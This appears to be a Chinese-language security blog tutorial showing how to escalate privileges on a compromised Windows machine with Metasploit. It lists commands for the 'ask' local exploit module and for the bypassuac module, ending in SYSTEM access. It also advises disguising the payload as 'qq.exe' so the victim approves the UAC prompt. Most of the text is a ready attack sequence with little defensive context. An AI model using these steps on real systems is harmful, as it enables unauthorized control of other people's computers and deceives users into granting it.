提權大致也就3種方法
1. 提高程序運行權限級別
2. Uac繞過
3. 提權漏洞
我這裡先用第一種來演示
前提是msf已經獲取到了 一個session
![「黑客技術」Msf提高程序運行權限級別提權](http://p2.ttnews.xyz/loading.gif)
Getiud查看用戶 是用戶權限
Getsystem報錯 看到是沒法提權的
接下來 background退到後臺
use exploit/windows/local/ask
加載模塊
![「黑客技術」Msf提高程序運行權限級別提權](http://p2.ttnews.xyz/loading.gif)
Show options
Set session 1
設置 session為 剛剛獲取到得session
運行後會彈出 uac的攔截
Filename 可以設置文件的名字 偽裝文件例如qq使得 用戶點擊確認
Set filename qq.Exe
接下來 run 運行 等待就可以了
接下來我們就可以看到靶機那邊彈出用戶控制的框
點擊確定
在msf那邊就可以獲取到一個新的sesion
Getuid
還是用戶權限
Getsystem
看到現在已經獲取到了管理員權限
Msf繞過uac
use exploit/windows/local/bypassuac 再按幾下tab鍵 可以看到繞過uac還是有很多模塊和方法的 例如進程注入 vbs繞過等等
我這裡直接用bypassuac模塊
Show options
這裡只需要設置個session就可以了
Set session 3
Run
執行成功
反彈回來一個session
Getuid
用戶權限
Getsystem
Getuid
獲取system權限成功
閱讀更多 信息安全教學 的文章